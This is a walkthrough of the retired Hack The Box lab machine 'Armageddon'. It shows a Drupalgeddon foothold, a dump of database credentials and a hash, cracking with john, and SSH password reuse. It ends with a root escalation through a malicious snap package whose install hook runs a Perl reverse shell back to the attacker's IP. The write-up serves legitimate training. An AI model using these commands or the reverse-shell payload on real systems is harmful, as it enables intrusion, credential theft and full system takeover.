Armageddon is being retired from Hackthebox today (or at least, on the day I’m writing this), and having just completed it recently, I thought I would post a walkthrough. This box is rated easy, which felt pretty accurrate. basic enum (and some hints from the name) can get someone to root pretty quick.
Initial Scan
# Nmap 7.91 scan initiated Sun Jul 11 02:36:48 2021 as: nmap -A -O -p- -oA armageddon -vv 10.10.10.233
Nmap scan report for 10.10.10.233
Host is up, received reset ttl 63 (0.082s latency).
Scanned at 2021-07-11 02:36:49 UTC for 69s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDC2xdFP3J4cpINVArODYtbhv+uQNECQHDkzTeWL+4aLgKcJuIoA8dQdVuP2UaLUJ0XtbyuabPEBzJl3IHg3vztFZ8UEcS94KuWP09ghv6fhc7JbFYONVJTYLiEPD8nrS/V2EPEQJ2ubNXcZAR76X9SZqt11JTyQH/s6tPH+m3m/84NUU8PNb/dyhrFpCUmZzzJQ1zCDStLXJnCAOE7EfW2wNm1CBPCXn1wNvO3SKwokCm4GoMKHSM9rNb9FjGLIY0nq+8mt7RTJZ+WLdHsje3AkBk1yooGFF+0TdOj42YK2OtAKDQBWnBm1nqLQsmm/Va9T2bPYLLK5aUd4/578u7h
| 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBE4kP4gQ5Th3eu3vz/kPWwlUCm+6BSM6M3Y43IuYVo3ppmJG+wKiabo/gVYLOwzG7js497Vr7eGIgsjUtbIGUrY=
| 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG9ZlC3EA13xZbzvvdjZRWhnu9clFOUe7irG8kT0oR4A
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to Armageddon | Armageddon
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/11%OT=22%CT=1%CU=34089%PV=Y%DS=2%DC=T%G=Y%TM=60EA598
OS:6%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=107%TI=Z%II=I%TS=A)SEQ(SP=FD
OS:%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=A)SEQ(SP=FD%GCD=1%ISR=107%TI=Z%CI=I%TS=
OS:A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M5
OS:4DST11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=712
OS:0)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=
OS:)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%
OS:A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%
OS:DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=
OS:40%CD=S)
Uptime guess: 49.708 days (since Sat May 22 09:37:46 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=253 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 82.11 ms 10.10.14.1
2 82.22 ms 10.10.10.233
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 11 02:37:58 2021 -- 1 IP address (1 host up) scanned in 70.32 seconds
Exploit
From the nmap scan, we can see that there’s a drupal installation, version 7. I’m not sure what version drupal is up to currently, but I’m pretty sure that 7 is fairly old. With that in mind, I also know that a few years ago there was a massive vulnerability called “drupalgeddon”. In fact, one of the other boxes I did a walkthrough on used this same exploit. Given this vague memory and the machine name, I decided to go ahead and try it from metasploit to see if we were able to get a quick shell.
Lateral
Once getting a shell, the first thing I tried checking was the drupal config. At minimum, we should be able to find DB credentials.
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupal',
'username' => 'drupaluser',
'password' => 'CQHEy@9M*m23gBVj',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
Using that password, we can quickly dump the users table: echo "SELECT * FROM users;" | mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal
Excuse the poorly formatted text:
uid name pass mail theme signature signature_format created access login status timezone language picture init data
0 NULL 0 0 0 0 NULL 0 NULL
1 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt [email protected] filtered_html 1606998756 1607077194 1607076276 1 Europe/London 0 [email protected] a:1:{s:7:"overlay";i:1;}
We can throw that hash into a file and then use john to crack.
kali@kali:~/htb/armageddon$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt ./bruce_pass.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Drupal7, $S$ [SHA512 512/512 AVX512BW 8x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
booboo (?)
1g 0:00:00:00 DONE (2021-07-11 03:08) 2.173g/s 504.3p/s 504.3c/s 504.3C/s tiffany..harley
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Where to go from here? One quick and easy thing we should always check is password re-use. We have a username and password, lets see if they used the same credentials for the box itself.
kali@kali:~/htb/armageddon$ ssh [email protected]
The authenticity of host '10.10.10.233 (10.10.10.233)' can't be established.
ECDSA key fingerprint is SHA256:bC1R/FE5sI72ndY92lFyZQt4g1VJoSNKOeAkuuRr4Ao.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.233' (ECDSA) to the list of known hosts.
[email protected]'s password:
Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
[brucetherealadmin@armageddon ~]$ ls
Success!
Escalation
As always, we should check and see what we can do as this user. Abusing sudo is something that’s quick to check and possibly quick to root, so lets do that.
[brucetherealadmin@armageddon ~]$ sudo -l
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
(root) NOPASSWD: /usr/bin/snap install *
Excellent, we can in fact run something as root. So, how can we abuse this? Checking the excellent resource GTFO bins, we find an entry for snap that gives us step by step instructions for how to break out.
On my machine, I executed the following instructions:
read -r -d '' COMMAND <<'EOF'
perl -e 'use Socket;$i="10.10.14.231";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
EOF
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta
kali@kali:/tmp/tmp.0SPKJt1A2A$ python3 -m http.server 8000 --bind 10.10.14.231
And then on the target:
curl http://10.10.14.231:8000/xxxx_1.0_all.snap > xxxx_1.0_all.snap
sudo snap install xxxx_1.0_all.snap --dangerous --devmode
That should immediately drop us into a root shell.